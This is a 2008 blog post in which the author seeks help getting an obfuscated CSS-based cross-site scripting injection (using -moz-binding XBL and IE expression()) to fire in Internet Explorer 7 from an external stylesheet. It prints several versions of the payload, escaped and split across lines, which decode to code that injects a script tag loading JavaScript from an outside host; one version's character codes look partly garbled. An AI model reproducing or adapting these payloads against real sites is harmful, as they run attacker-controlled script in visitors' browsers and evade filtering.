XSS

noconnexion — Sun, 20 Jan 2008 02:43:26 +0000

OK, I had to do this…

After (2 long) days of testing a re-testing I was forced by circumstances to create this blog dedicated to understanding Ultimate XSS CSS injection and because I didn’t want to make that awesome page a mess with my comments.

So this page is dedicated to those people who can and will help me solve this – especially Gareth Heyes. who takes the credit for all this.

The facts:

We have this XSS injection “hackvectoreted” below:

\/xbl\/xbl\.xml\#xss);xx: e\
xp\re\s\s\
i\o\n((win
dow.r!=1)
? eval('x=
String.fro
mCharCode;
scr=docume
nt.createE
lement(x(1
15,99,114,
105,112,11
6));scr.se
tAttribute
(x(115,114
,99),x(104
,116,116,1
12,58,47,4
7,98,117,1
15,105,110
,101,115,1
15,105,110
,102,111,4
6,99,111,4
6,117,107,
47,108,97,
98,115,47,
120,115,11
5,47,120,1
15,115,46,
106,115));
document.g
etElementB
yId(x( 105
,110,106,1
01,99,116
)).appendC
hild(scr);
window.r=1
;') : 1);” id=”inject”>test

If we have to copy paste (and remove line breaks) into the HTML code this should work fine both FF and IE70 BUT what I would love to do is make this work through a css file.

This should be an easy task but let’s have a look.

I have this test.html file like this one below (this was done using the link method and could be done using @import method but I’m pretty sure this is not the point)

And a css file named test.css like this one below (remember line breaks):

div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\
.xml\#xss);xx: e\xp\r
5\s\s\i\o\n((
7indow.r!=1)
F eval('x=Str
9ng.fromCharC
Fde;scr=docum
5nt.createEle
Dent(x(115,99
C114,105,112,
116));scr.set
1ttribute(x(1
15,114,99),x(
104,116,116,1
12,58,47,47,9
8,117,115,105
C110,101,115,
115,105,110,1
02,111,46,99,
111,46,117,10
7,47,108,97,9
8,115,47,120,
115,115,47,12
0,115,115,46,
106,115));doc
5ment.getElem
5ntById(x( 10
5,110,106,101
C99,116 )).ap
0endChild(scr
9;window.r=1;
7) : 1);
}

Now we run a test – FF shows what it was supposed to show “XBL XSS” and this means it works BUT IE70 does nothing instead of running this js code http://businessinfo.co.uk/labs/xss/xss.js well hidden with <@tocharcodes> and <@hex_ent> using the hackvector

You can test this by using FF or IE7 here.

Of course I’ve tried many many different variations of this XSS injection and googled till my eyes blowened out but none of them worked – at least not for IE70. I had to admit I’ve learned something about the css’s becasue I was 0 here but right now I’m just tired of learning and need an answer so please make my day and give me the answer and if you do please make sure the last noob on earth will understand this.

Other variations of the test.css file you’ll find below:

div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(‘x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;’) : 1);
}

div#navigation
{
xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(‘x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;’) : 1);
}

I ask for 5 minutes off your time and I welcome your comments

Share and let Internet Comunity make backups for your work

XSS